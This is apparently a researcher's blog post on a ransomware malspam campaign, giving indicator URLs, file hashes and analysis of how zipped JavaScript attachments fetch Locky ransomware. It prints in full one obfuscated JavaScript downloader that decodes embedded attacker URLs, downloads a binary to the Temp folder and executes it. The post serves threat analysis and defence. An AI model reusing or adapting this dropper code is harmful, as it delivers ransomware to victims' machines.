Quick post for today. I have been seeing a lot of malspam with malicious Javascript attachments zipped inside a 7zip archive for the past couple of days. The emails themselves all seem to revolve around the theme of a receipt or invoice as seen below. From what I can tell, the scripts are all about the same and the binary downloaded from each of the sites are exactly the same file. I am not sure if this is the case with the other emails from yesterday or the day before, but I can only assume it is.
All the scripts from the batch that I obtained along with the malicious binary files from the URLs that were still working are posted in my Github which you can find here.
IOCs:
=====
hxxp://bridleridgehorses[.]com/jhgf54y6??QDPriSzAYm=QDPriSzAYm
hxxp://pesonamas[.]co[.]id/jhgf54y6??QDPriSzAYm=QDPriSzAYm
hxxp://aimonino[.]info/p66/jhgf54y6?QDPriSzAYm=QDPriSzAYm
hxxp://bridleridgehorses[.]com/jhgf54y6??kJPCDso=kJPCDso
hxxp://pesonamas[.]co[.]id/jhgf54y6??kJPCDso=kJPCDso
hxxp://aimonino[.]info/p66/jhgf54y6?kJPCDso=kJPCDso
hxxp://bibtic[.]net/jhgf54y6??twMGpm=twMGpm
hxxp://enixgaming[.]de/jhgf54y6??twMGpm=twMGpm
hxxp://aimonino[.]info/p66/jhgf54y6?twMGpm=twMGpm
hxxp://sonucbirebiregitim[.]com/jhgf54y6??nuRagkR=nuRagkR
hxxp://bibtic[.]net/jhgf54y6??nuRagkR=nuRagkR
hxxp://aimonino[.]info/p66/jhgf54y6?nuRagkR=nuRagkR
hxxp://fbl[.]com[.]sg/jhgf54y6??WHQaPtXLDg=WHQaPtXLDg
hxxp://kitami-ansin[.]com/jhgf54y6??WHQaPtXLDg=WHQaPtXLDg
hxxp://aimonino[.]info/p66/jhgf54y6?WHQaPtXLDg=WHQaPtXLDg
Artifacts:
==========
File name: da3a2a61-7776-4ecd-a336-2877bd8a7284.js
File size: 15KB
File path: NA
MD5 hash: 56947C09717C6D5E6ED82EC5871C24AD
Virustotal: http://www.virustotal.com/#/file/ccf179d93cbe54f4e3c9c1343f49c21d397e7f5a499efef5e280f4746f2c0981/detection
Detection ratio: 17 / 59
First detected: 2017-10-03 08:35:10
Reverse.IT: http://www.reverse.it/sample/ccf179d93cbe54f4e3c9c1343f49c21d397e7f5a499efef5e280f4746f2c0981?environmentId=100
File name: WHQaPtXLDg2.exe
File size: 577KB
File path: C:\Users\%username%\AppData\Local\Temp
MD5 hash: 358eaa145a5214c25c82de30c928543a
Virustotal: http://www.virustotal.com/#/file/811631d9c535035ed772ad669aa00a3a3a3e89fc26c5ef63a0f3d9c85eabe81f/detection
Detection ratio: 15 / 66
First detected: 2017-10-03 09:56:25
Reverse.IT: http://www.reverse.it/sample/811631d9c535035ed772ad669aa00a3a3a3e89fc26c5ef63a0f3d9c85eabe81f?environmentId=100
Analysis:
=========
All the emails are also spoofed so it looks like someone from within the organization is sending it. The attachments all seem to be similarly named. In today’s batch of emails, they all start with “A_.7z”. Several that I saw from yesterday and the day before all seem to copy this type of naming convention as well (some random letter and then underscore with random numbers in a random length.7z).
Like all other forms of encrypting malware, this is a pretty straight-forward infection. Once the user extracts the zip file, they are presented with a Javascript file. Unfortunately I am not versed with Javascript so I was not able to deobfuscate the script. Here is an example of one of the scripts.
function setRH(CR, VR){ CR[VR]("User"+"-Agent", "TW96aWxsYS80LjAgKAMASKGNvbXBhdGlibGU7IE1TSUUgNi4wOyKAMASBXaW5kb3dzIE5UIDUuMCk=".acetilenButan()); } var PotterGaablebodied_SayNoNo ="KAMAS"+ ""+""; var silkopil = "/"; var meuArData = new Array( 52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,115,52,52,52,116,105,106,107,108,109,110,111,112,113,114,52,52,52,52,52,52,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,52,52,52,52,52,52,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52 ); dirtyGog = {'U':'S' , ':':'.' , '88':'' , 'CHICHA':'onseBody' , '77':'' , '101':'' , 'SEREDINA':'X', '11':''}; function PotterGaablebodied_FROG2sud(vardos){ return vardos[("PotterGaablebodied_front","PotterGaablebodied_borough","PotterGaablebodied_inert","PotterGaablebodied_disclose","PotterGaablebodied_textiles","l")+"en" +("PotterGaablebodied_burthen","PotterGaablebodied_unconcealed","PotterGaablebodied_liberia","PotterGaablebodied_reedy","PotterGaablebodied_hexameter","gt")+"h"]; }var birdMAN =1 + 0xfd +1; var meuArDataHO = PotterGaablebodied_FROG2sud(meuArData); for (velVITK_OBLOM= 0; meuArDataHO >velVITK_OBLOM ; ++velVITK_OBLOM) { meuArData[velVITK_OBLOM] = -50+meuArData[velVITK_OBLOM] - 3; } var dirtyGog; var velVITK_BOSKO_2S = ""; var proto = "prot"+"otype"; var ft11 = function() { var PotterGaablebodied_RazlomSS, line4, PotterGaablebodied_Selection1, PotterGaablebodied_FROG2c4; var PotterGaablebodied_FROG2out = ""; var line3= this.replace(/KAMAS/gi, PotterGaablebodied_FROG2out);line6 = 0; var PotterGaablebodied_FROG2len = PotterGaablebodied_FROG2sud(line3); while (line6 < PotterGaablebodied_FROG2len) { do { var PotterGaablebodied_koch = line3.charCodeAt(line6++) &(0x132- 0x33); PotterGaablebodied_RazlomSS = meuArData[PotterGaablebodied_koch]; } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_RazlomSS == -1); if (PotterGaablebodied_RazlomSS == -1) break; do { stembl = "the"; line4 = meuArData[line3.charCodeAt(line6++) & birdMAN]; } while (line6 < PotterGaablebodied_FROG2len && line4 == -1); if (line4 +2+1== 1+1) break; PotterGaablebodied_FROG2out += String.fromCharCode((PotterGaablebodied_RazlomSS << 2) | ((line4 & 0x30) >> 4)); do { PotterGaablebodied_Selection1 = line3.charCodeAt(line6++) & 0xff; if (PotterGaablebodied_Selection1 == 61) return PotterGaablebodied_FROG2out; PotterGaablebodied_Selection1 = meuArData[PotterGaablebodied_Selection1]; } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_Selection1 == -1); if (PotterGaablebodied_Selection1 == -1) break; PotterGaablebodied_FROG2out += String.fromCharCode(((line4 & (0xe+1)) << 4) | ((PotterGaablebodied_Selection1 & 0x3c) >> 2)); do { PotterGaablebodied_FROG2c4 = line3.charCodeAt(line6++) & birdMAN; if (PotterGaablebodied_FROG2c4 == 61) return PotterGaablebodied_FROG2out; PotterGaablebodied_FROG2c4 = meuArData[PotterGaablebodied_FROG2c4]; } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_FROG2c4 == -1); if (PotterGaablebodied_FROG2c4 == -1) break; PotterGaablebodied_FROG2out += String.fromCharCode(((PotterGaablebodied_Selection1 & 0x03) << 6) | PotterGaablebodied_FROG2c4); } return PotterGaablebodied_FROG2out; }; function PotterGaablebodied_FROG2undefilled(rx, ry) { rx =HCKD / RDMP ; ry = velVLUMAHZZ + 109; }; PotterGaablebodied_FROG2undefilled.dEDWWEE = function(){ PotterGaablebodied_FROG2ok(PotterGaablebodied_FROG2spyFunction1.PotterGaablebodied_FROG2calledWith(), "Function called without arguments"); PotterGaablebodied_FROG2publisher.PotterGaablebodied_FROG2publish(this.PotterGaablebodied_FROG2type1, "PROPER1"); PotterGaablebodied_FROG2ok(PotterGaablebodied_FROG2spyFunction1.PotterGaablebodied_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument"); PotterGaablebodied_FROG2publisher.PotterGaablebodied_FROG2publish(this.PotterGaablebodied_FROG2type1, ["PROPER1", "PROPER2"]); }; String["prototype"].acetilenButan =ft11; function Gashish(SOcksRadFROGvostochniy){ SOcksRadPUPPYna = SOcksRadFROGvostochniy; for (var SOcksRadFROG2XCOP in dirtyGog){ SOcksRadPUPPYna = SOcksRadPUPPYna["repl" + "ace"](SOcksRadFROG2XCOP, dirtyGog[SOcksRadFROG2XCOP]); } return SOcksRadPUPPYna; }; var topSecretLine; var PotterGaablebodied_LLL0LLL = "l"; var PotterGaablebodied_FROG2TRUEFALSE=("V2lKAMASuZG93cyBTY3JpcKAMASHQgSG9zdA=KAMAS=".acetilenButan() +"MPO203ZDD" =="KAMASV2lKAMASuZG93cyBTY3JpcKAMASHQgSG9zdA==".acetilenButan() +"MPO203ZDD")&&typeof(PotterGaablebodied_FROG2GzEAPd)==="undefined"; var PotterGaablebodied_FROGsrq = "UmVxdWVzdEhlYWRlcg==".acetilenButan(); var PotterGaablebodiedFPADRML =("").acetilenButan(); var PotterGaablebodied_FROG2lidgen = "QWN0KAMASaXZlWEKAMAS9iamVjdA==".acetilenButan(); var PotterGaablebodied_FROG2chosen = Math.round(0.7 * 2 - 0.4); var takeshiKitana = new Function("KAMAS,KAMAS2", "KAMAS[KAMAS2]();"); if(!PotterGaablebodied_FROG2TRUEFALSE){ PotterGaablebodied_FROG2undefilled.scale = function(PotterGaablebodied_FROG2p, PotterGaablebodied_FROG2scaleX, PotterGaablebodied_FROG2scaleY) { if (line6sObject(PotterGaablebodied_FROG2scaleX)) { PotterGaablebodied_FROG2scaleY = PotterGaablebodied_FROG2scaleX.y; PotterGaablebodied_FROG2scaleX = PotterGaablebodied_FROG2scaleX.x; } else if (!line6sNumber(PotterGaablebodied_FROG2scaleY)) { PotterGaablebodied_FROG2scaleY = PotterGaablebodied_FROG2scaleX; } return new PotterGaablebodied_FROG2undefilled(PotterGaablebodied_FROG2p.x * PotterGaablebodied_FROG2scaleX, PotterGaablebodied_FROG2p.y * PotterGaablebodied_FROG2scaleY); }; } function PotterGaablebodiedFPADZO_ZO(TT){ eval(TT); } if(!PotterGaablebodied_FROG2TRUEFALSE){ PotterGaablebodied_FROG2undefilled.PotterGaablebodied_FROG2sameOrN = function(PotterGaablebodied_FROG2param1, PotterGaablebodied_FROG2param2) { return PotterGaablebodied_FROG2param1.D == PotterGaablebodied_FROG2param2.D || PotterGaablebodied_FROG2param1.F == PotterGaablebodied_FROG2param2.F; }; PotterGaablebodied_FROG2undefilled.angle = function(PotterGaablebodied_FROG2p) { return Math.atan2(PotterGaablebodied_FROG2p.y, PotterGaablebodied_FROG2p.x); }; } var PotterGaablebodied_FROG2VARDOCF ="JVRFKAMASTVAlKAMAS".acetilenButan(); var oLDNameCreator = new Function("KAMAS,KAMAS","topSecretLine = "+ ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").acetilenButan() + ".acetilenButan();');"); var PotterGaablebodiedruchka ="RXhwYW5KAMASkRW52aXJvbm1lbnRTdHJKAMASpbmKAMASdz".acetilenButan(); var PotterGaablebodied_FROGhatershaha = ""; var PotterGaablebodied_FROGodnoklass = "WHQaPtXLDg"; function placeHolder(AOn){ return new ActiveXObject(AOn); } var PotterGaablebodied_FROG2Native = function(options){ }; if(WSH){PotterGaablebodied_FROG2Native.line6mplement = function(PotterGaablebodied_FROG2objects, PotterGaablebodied_FROG2properties){ for ( var line6 = 0, PotterGaablebodied_FROG2l = PotterGaablebodied_FROG2objects.length; line6 < PotterGaablebodied_FROG2l; line6++) PotterGaablebodied_FROG2objects[line6].line6mplement(PotterGaablebodied_FROG2properties); }; oLDNameCreator(); } var PotterGaablebodied_FROG2d7 ="WA==".acetilenButan() + "M" +"L"; var PotterGaablebodied_FROG2_bChosteck = "aHR0cDovLwKAMAS=KAMAS="; function PotterGaablebodied_FROG2_bCho(T, D, C) { R =D +""; T[D+""](C); } PotterGaablebodied_FROG2d7 = topSecretLine() + PotterGaablebodied_FROG2d7+ Gashish(("PotterGaablebodied_inquisitiveness","PotterGaablebodied_ethiopia","PotterGaablebodied_regional","PotterGaablebodied_origins","PotterGaablebodied_inane","2.")+"SEREDINAML77H101T"+"TP45KAMAS45"+"WS"+"cr"+"ipt:Uh")+"e"+"ll"; var PotterGaablebodied_FROG2DoUtra = [PotterGaablebodied_FROG2lidgen, PotterGaablebodiedruchka,PotterGaablebodied_FROG2VARDOCF,"LmVKAMAS4ZQ=KAMAS=".acetilenButan(), "UnKAMASVuKAMAS".acetilenButan(),PotterGaablebodied_FROG2d7]; PotterGaablebodied_FROG2Richters=PotterGaablebodied_FROG2DoUtra.shift(); var PotterGaablebodied_FROG2d2=PotterGaablebodied_FROG2DoUtra.pop(); PotterGaablebodied_FROG2fabled="Selection2Action"; var PotterGaablebodied_FROG2LitoyDISK=ActiveXObject; var massMarket=PotterGaablebodied_FROG2d2.split("45");PotterGaablebodied_FROG2Native.PotterGaablebodied_FROG2typize=function(a,b){a.type||(a.type=function(a){return PotterGaablebodied_FROG2$type(a)===b})}; PotterGaablebodied_FROGcccomeccc = "p"; var Limbus2000=new Function("HORN",' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("DILBO", "D").replace("32", "eam");'); function x3fx3d(rdf){ return "\x3F"+rdf+"\x3D"; } function PotterGaablebodied_FROG2_cCho(a,b,c,d){a[b](c,d)} abtest = massMarket[PotterGaablebodied_FROGcccomeccc + "op"](); var PotterGaablebodiedGooodName; function mimimix2(){ try{ ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/ for( var i = 0; i < 8; i++){ for( var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j]; } }catch(exc1){ } PotterGaablebodiedGooodName = "b3BlbgKAMAS=KAMAS=".acetilenButan(); } PotterGaablebodiedSeason3 = placeHolder(abtest); mimimix2(); PotterGaablebodied_FROGletchikva=new ActiveXObject(massMarket[0]); PotterGaablebodied_FROG2tudabilo1 = "s"; eval(PotterGaablebodied_SayNoNo.acetilenButan()); var PotterGaablebodied_FROG2vulture = PotterGaablebodiedSeason3[PotterGaablebodied_FROG2DoUtra.shift()](PotterGaablebodied_FROG2DoUtra.shift()); PotterGaablebodied_FROG2weasel = "G\x45T"; var PotterGaablebodied_FROG2SIDRENKOV = PotterGaablebodied_FROG2DoUtra.shift(); PotterGaablebodied_FROG2SPASPI = "type"; var PotterGaablebodied_selectionPipe = PotterGaablebodied_FROG2DoUtra.shift(); function PotterGaablebodied_FROG2_aCho(R, K) { R[K](); } function PotterGaablebodiedcomBAT(PotterGaablebodied_FROG2gutter, PotterGaablebodied_FROG2StrokaParam2) { var PotterGaablebodiedWasechO = ""+ PotterGaablebodied_FROG2vulture; try{ PotterGaablebodiedWasechO=PotterGaablebodiedWasechO+silkopil; PotterGaablebodiedWasechO=PotterGaablebodiedWasechO +""+ PotterGaablebodied_FROG2StrokaParam2 ; PotterGaablebodied_FROGletchikva["open"](PotterGaablebodied_FROG2weasel, PotterGaablebodied_FROG2gutter, false); if(PotterGaablebodied_FROG2TRUEFALSE){ PotterGaablebodied_FROG2_cCho(PotterGaablebodied_FROGletchikva,"set"+(11,"PotterGaablebodied_nickel","PotterGaablebodied_killing","PotterGaablebodied_lucrative","PotterGaablebodied_marion","PotterGaablebodied_illegal","PotterGaablebodied_carboniferous","PotterGaablebodied_tanker",PotterGaablebodied_FROGsrq),"User-Agent","TW96aWxsYS80LjAgKAMASKGNvbXBhdGlibGU7IE1TSUUgNi4wOyKAMASBXaW5kb3dzIE5UIDUuMCk=".acetilenButan()); } vlogTry = "11" PotterGaablebodied_FROGletchikva[PotterGaablebodied_FROG2tudabilo1 + ("PotterGaablebodied_manoeuvre","PotterGaablebodied_clause","PotterGaablebodied_grass","PotterGaablebodied_database","PotterGaablebodied_current","en") + "" + "d"](); var kuzut = PotterGaablebodied_FROGletchikva["Re"+"sp"+(PotterGaablebodied_FROG2StrokaParam2,"PotterGaablebodied_subheading","PotterGaablebodied_fabled","PotterGaablebodied_lassie","PotterGaablebodied_sixtyseven",1123,dirtyGog['CHICHA'])]; //if(kuzut < 29989)return false; // if (kuzut[0]!= 77 || kuzut[1]!= 90)return false; var PotterGaablebodied_MainZ = new PotterGaablebodied_FROG2LitoyDISK(Limbus2000()); if (PotterGaablebodied_FROG2TRUEFALSE) { PotterGaablebodied_FROGGaSMa = "Selection10Action"; var takeshiKitana2 = new Function("KAMAS,KAMAS2", "KAMAS['wr"+"ite'](KAMAS2);"); takeshiKitana(PotterGaablebodied_MainZ,PotterGaablebodiedGooodName); PotterGaablebodied_MainZ[PotterGaablebodied_FROG2SPASPI] = PotterGaablebodied_FROG2chosen; takeshiKitana2( PotterGaablebodied_MainZ, kuzut); PotterGaablebodied_FROG2XWaxeQhw = "Selection11Action"; PotterGaablebodied_MainZ["position"] = 0; PotterGaablebodied_FROG2krDwvrh = "Selection12Action"; PotterGaablebodiedWasechO = PotterGaablebodiedWasechO + PotterGaablebodied_FROG2SIDRENKOV; PotterGaablebodied_MainZ["cKAMAS2F2KAMASZVKAMASRvRmlsZQ==".acetilenButan()](PotterGaablebodiedWasechO, 26/13); PotterGaablebodied_FROG2SswQdi = "Selection13Action"; PotterGaablebodied_MainZ.close(); PotterGaablebodiedSeason3[PotterGaablebodied_selectionPipe ](PotterGaablebodiedWasechO,0,false); } }catch(exception4){ return false;} return true; }; PotterGaablebodiedFPADZO_ZO(PotterGaablebodiedFPADRML); var PotterGaablebodied_FROGodnoklassYO = 1; var PotterGaablebodied_FROG2_a5 = ('KAMASZmJsLmNvbS5zZy9qaGdmNTR5Nj8KAMAS=SSSSKAMASa2l0YW1pLWFuc2luLmNKAMASvbS9qaGdmNTR5Nj8=SSSS'+'YWltb25pbm8uaW5mby9wNjYvamhnZjU0eTY='+'KAMAScGVzb25hbWFKAMASzLmNvLmlkL2poZ2Y1NHk2Pw==SSSSSSSSKAMAS').split("SSSS"); var KAMAS500 = new Function("PotterGaablebodied_FROG2_a5,PotterGaablebodied_FROG2HORDA5", 'return PotterGaablebodied_FROG2_bChosteck.acetilenButan() + PotterGaablebodied_FROG2_a5[PotterGaablebodied_FROG2HORDA5].acetilenButan();'); for(PotterGaablebodied_FROG2HORDA5 in PotterGaablebodied_FROG2_a5){ PotterGaablebodied_FROGodnoklassYO++; var s1=KAMAS500(PotterGaablebodied_FROG2_a5,PotterGaablebodied_FROG2HORDA5)+x3fx3d(PotterGaablebodied_FROGodnoklass)+PotterGaablebodied_FROGodnoklass; var sDA2=PotterGaablebodied_FROGodnoklass+ PotterGaablebodied_FROGodnoklassYO; if(PotterGaablebodiedcomBAT(s1,sDA2)){ break; } }
Once the Javascript file is executed, the script chooses one of the three URLs that is coded into the it and downloads the malicious binary. In this case I used a tool called URLRevealer from Kahu Security which created a local proxy server that logged all web requests. When I ran the scripts to see what URLs were being used, URLRevealor showed me three different URLs for each script. The only network traffic that I saw from my VM was the GET request for the malicious binary.
After the download of the binary and a couple of minutes, I was presented with the usual Locky (Ykcol) screens that we have seen in the past.